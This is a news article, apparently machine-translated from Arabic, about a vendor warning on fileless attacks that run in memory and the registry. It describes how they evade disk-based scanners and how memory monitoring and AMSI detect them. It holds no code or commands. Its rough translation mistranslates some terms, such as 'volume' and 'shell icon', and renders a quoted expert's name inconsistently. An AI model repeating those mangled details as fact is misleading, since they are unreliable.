A security warning against a wave of “file-free attacks” targeting data

A security alert issued by five of the most powerful information security teams in the world, warned of a wave of attacks expected in the coming period, during which cyber criminals use the method «attacks without files», known as one of the most used methods in cyber attacks and difficult to detect and confront, because it uses The electronic memory of computers and phones in carrying out attacks, which makes most of the protection programs and insurance tools and combat «out of the battle» in practice. This security alert appeared in a lengthy report published by TechRepublic.com in September, attributed to experts in five of the most powerful information security teams in the world, the information security teams in companies: «Microsoft» and «Trend Micro», Kaspersky, McAfee and Symantec.

The experts confirmed that the attacks will target devices and networks operating in different business sectors, such as telecommunications, banking, financial services, manufacturing, and utilities sectors of electricity and gas, targeting the theft of sensitive data and the spread of viruses, and encrypt files for ransom at the same time. .

«Attacks without files»

“Fileless attacks” means attacks where no “code”, malware or “commands” are used in the form of files, either to reach the target or to carry out the attack itself.

To implement this idea, these attacks are carried out entirely through the target chips of the device, without compromising the volume at all, or downloading any file on it, except simple text instructions, entered into the system's main registry system «Registry», to modify the values ​​and «commands» In it, to correspond to the onslaught.

In this way, this method is radically different from the hundreds of other methods used in launching attacks, which rely mainly on the transfer and download files on the volume, containing a "load" of malware, whether viruses or spyware, or encryption programs, or theft Data, then «tuck» these files somewhere in the volume, then unload their load of malware in specific places, and then this load installs and runs programs as identified by the attackers.

Difficulty detecting

The danger of these attacks is that the overwhelming majority of control and protection programs and systems are primarily designed to monitor, scan, detect, and eliminate security attacks and threats on the basis of a single rule: files are downloaded to the volume, the attack is carried out, and Then all the scans, discovery and control deal with the volume, hence the method of fileless attacks makes all these systems and software specialized in protection outside the «battlefield», which is in this case the memory chip, not the volume, and therefore difficult to detect The attack is repelled Before they happen, or stop them and eliminate them as they happen.

Discovery and treatment

The most effective measure in detecting these attacks is to monitor and clear memory, identify abnormal behavior, and examine the modules injected with the software, said Jata Shariya, a supervisor of the Microsoft Information Security Team on the development of the Microsoft Defender security system. On the other hand, from the starting point to the end of the process, the protection system charged with repelling the attack must be able to see the objects being loaded into memory, be they a payload or a shell icon, then stop it, then kill the processes associated with it, to completely stop the attack. .

Microsoft's security team has made progress in this regard, Sharia said, making the security program known as AMSI capable of seeing what is happening in memory, monitoring abnormal activity of the attack and stopping it at the right point.

Origin and history

The quality of «files without attacks» emerged as an idea several years ago, but it was not carried out literally until recently, and began periodic security reports actually monitored since 2017 and early 2018 only, and the hour was carried out at relatively low rates, and somewhat primitive, does not cause damage Extensive sweeper.

But experts in the five information security teams say that there has been a significant development in this type of attacks, both in terms of quantity, and the quality of the attack and its severity, after the attackers made progress in their tactics and experience in dealing with electronic memory modules.